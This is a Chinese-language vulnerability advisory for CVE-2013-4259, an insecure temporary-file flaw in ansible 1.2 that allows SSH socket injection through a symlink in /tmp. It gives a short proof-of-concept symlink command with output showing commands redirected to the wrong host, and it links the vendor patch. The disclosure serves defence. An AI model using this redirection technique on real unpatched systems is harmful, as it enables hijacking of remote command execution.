ansible不安全临时文件创建漏洞(CVE-2013-4259)

发布日期:2013-09-03
更新日期:2013-09-05

受影响系统:
ansible ansible 1.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62137
CVE(CAN) ID: CVE-2013-4259

ansible是简单的配置管理、部署、任务执行、多节点编制框架。

ansible 1.2会在/tmp的可预测位置创建ControlMaster文件,可造成ssh套接字注入,导致符号链接攻击,覆盖受影响应用上下文中的任意文件。

<*来源:Michael Scherer (mscherer@redhat com)
 
  链接:https://bugzilla.redhat.com/show_bug.cgi?id=998223
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

~ $ sudo ln -s /tmp/ansible-ssh-elspeth.example.org-22-misc /tmp/ansible-ssh-sisay.example.org-22-misc


~ $ ansible -i 'elspeth.example.org,sisay.example.org' all -m shell -u misc -a hostname
elspeth.example.org | success | rc=0 >>
elspeth.example.org

sisay.example.org | success | rc=0 >>
elspeth.example.org

建议:
--------------------------------------------------------------------------------
厂商补丁:

ansible
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://github.com/ansible/ansible

https://github.com/ansible/ansible/commit/6bf5d195065bc23b5fc72ba690d7ed45f228aaf0

相关推荐